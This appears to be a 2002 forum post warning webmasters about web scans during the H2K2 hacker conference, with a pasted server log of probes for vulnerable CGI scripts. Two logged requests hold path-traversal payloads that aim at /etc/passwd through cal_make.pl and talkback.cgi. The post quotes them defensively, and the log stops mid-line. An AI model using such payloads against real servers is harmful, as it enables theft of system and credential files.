ALERT! Hackers conference now on in NYC
http://www.h2k2.net/faq.html
Q: What is H2K2?
A: H2K2 is the 2002 Hackers On Planet Earth (HOPE) conference, a gathering for hackers of all types.
Be alert to this. The type of probe being run is testing for 'well known applications' being installed in your cgi-bin, among other places. No doubt many or all of these are compromised. Be aware...
eg:
- [13/Jul/2002:23:12:17 -0700] "HEAD / HTTP\\1.0" 400 0 "-" "-"
- [13/Jul/2002:23:12:18 -0700] "HEAD /// HTTP/1.0" 200 0 "-" "-"
- [13/Jul/2002:23:12:18 -0700] "HEAD ///server-info HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:18 -0700] "HEAD ///server-status HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:19 -0700] "HEAD /site/eg/ HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:19 -0700] "HEAD /doc/ HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:19 -0700] "HEAD /~nobody/ HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:19 -0700] "HEAD ///manual/ HTTP/1.0" 200 0 "-" "-"
- [13/Jul/2002:23:12:19 -0700] "HEAD /cgi-bin/ HTTP/1.0" 403 0 "-" "-"
- [13/Jul/2002:23:12:20 -0700] "HEAD /cgi-bin/ad.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:20 -0700] "HEAD /cgi-bin/aglimpse HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:23 -0700] "HEAD /cgi-bin/AnyForm2 HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:23 -0700] "HEAD /cgi-bin/bbs_forum.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:23 -0700] "HEAD /cgi-bin/bsguest.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:23 -0700] "HEAD /cgi-bin/bslist.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:23 -0700] "HEAD /cgi-bin/campas HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:23 -0700] "HEAD /// HTTP/1.0" 200 0 "-" "-"
- [13/Jul/2002:23:12:24 -0700] "HEAD ///carbo.ddl HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:24 -0700] "HEAD /cgi-bin/count.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:24 -0700] "HEAD /cgi-bin/cgforum.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:24 -0700] "HEAD /cgi-bin/faxsurvey HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:24 -0700] "HEAD /cgi-bin/gbook.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:27 -0700] "HEAD /cgi-bin/htsearch HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:27 -0700] "HEAD /cgi-bin/htmlscript HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:27 -0700] "HEAD /cgi-bin/jj HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:27 -0700] "HEAD /technote/ HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:27 -0700] "HEAD /cgi-bin/mmstdod.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:28 -0700] "HEAD /cgi-bin/newdesk HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:28 -0700] "HEAD /cgi-bin/register.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:28 -0700] "HEAD /cgi-bin/simplestguest.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:28 -0700] "HEAD /cgi-bin/statusconfig.pl HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:31 -0700] "HEAD /cgi-bin/webgais HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:31 -0700] "HEAD /iisadmpwd/ HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:34 -0700] "HEAD /cgi-bin/webgais HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:44 -0700] "HEAD /cgi-bin/infosrch.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:45 -0700] "HEAD /cgi-bin/rguest.exe HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:46 -0700] "HEAD /mall_log_files/ HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:47 -0700] "HEAD /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:47 -0700] "HEAD /Admin_files/ HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:48 -0700] "GET ///quote.html HTTP/1.0" 404 282 "-" "-"
- [13/Jul/2002:23:12:48 -0700] "GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 289 "-" "-"
- [13/Jul/2002:23:12:58 -0700] "HEAD /cgi-bin/dcboard.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:58 -0700] "GET /cgi-bin/nph-maillist.pl HTTP/1.0" 404 293 "-" "-"
- [13/Jul/2002:23:12:58 -0700] "GET /cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0" 404
